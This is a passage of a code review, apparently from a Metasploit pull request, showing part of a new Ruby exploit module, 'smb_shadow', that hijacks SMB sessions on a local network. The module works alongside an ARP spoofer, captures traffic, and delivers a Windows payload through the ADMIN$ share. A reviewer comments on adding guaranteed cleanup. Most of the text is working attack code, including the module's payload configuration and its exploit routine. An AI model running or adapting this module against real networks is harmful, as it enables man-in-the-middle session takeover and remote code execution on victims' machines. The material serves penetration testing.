modules/exploits/windows/smb/smb_shadow.rb

```diff
@@ -0,0 +1,649 @@
+        autheticate to another host on the local area network.
+
+        SMB Direct Session takeover is a combination of previous attacks.
+
+        This module is dependent on an external ARP spoofer. The builtin ARP
+        spoofer was not providing sufficient host discovery. Bettercap v1.6.2
+        was used during the development of this module.
+
+        The original SMB relay attack was first reported by Sir Dystic on March
+        31st, 2001 at @lanta.con in Atlanta, Georgia.
+      },
+      'Author'         =>
+        [
+          'usiegl00'
+        ],
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true,
+          'StackAdjustment' => -3500,
+        },
+      'References'     =>
+        [
+            [ 'URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack' ]
+        ],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DisclosureDate' => '2021-02-16',
+      'DefaultTarget' => 0 ))
+
+    register_options(
+      [
+        OptString.new('SHARE',    [ true, "The share to connect to", 'ADMIN$' ])
+        # For future cross LAN work:
+        #OptString.new('GATEWAY',  [ true, "The network gateway ip address" ])
+      ])
+
+    deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','SECRET','GATEWAY_PROBE_HOST','GATEWAY_PROBE_PORT','TIMEOUT')
+  end
+
+  def exploit
+    print_good("INFO : Warming up...")
+    print_error("WARNING : Not running as Root. This can cause socket permission issues.") unless Process.uid == 0
+    @sessions = {}
+    @main_threads = []
+    @interface = datastore['INTERFACE'] || Pcap.lookupdev
+    raise "ERROR : Interface not found: #{@interface}" unless Socket.getifaddrs.map(&:name).include? @interface
+    @ip4 = ipv4_addresses[@interface]&.first
+    raise "ERROR : Interface does not have address: #{@interface}" unless @ip4&.count(".") == 3
+    @mac = get_mac(@interface)
+    # For future cross LAN work: (Gateway is required.)
+    #raise "ERROR : Interface does not have mac: #{@interface}" unless @mac
+    #@gateip4 = datastore['GATEWAY']
+    #raise "ERROR : Invalid Gateway ip address: #{@gateip4}" unless @gateip4&.count(".") == 3
+    #@gatemac = arp(tpa: @gateip4)
+    #raise "ERROR : Unable to retrieve Gateway mac address: #{@gateip4}" unless @gatemac && @gatemac.class == String
+    @share = datastore['SHARE']
+    print_status("Self: #{@ip4} | #{@mac}")
+    #print_status("Gateway: #{@gateip4} | #{@gatemac}")
+    disable_p445_fwrd
+    start_syn_capture
+    start_ack_capture
+    print_status("INFO : This module must be run alongside an arp spoofer / poisoner.")
+    print_status("INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.")
+    main_capture
+  end
```

Comment:
Since there's the potential of races/fail_with calls here, can we add an ensure for the cleanup mechanism to always happen :+1:

```suggestion
    main_capture
  ensure
     cleanup
  end
```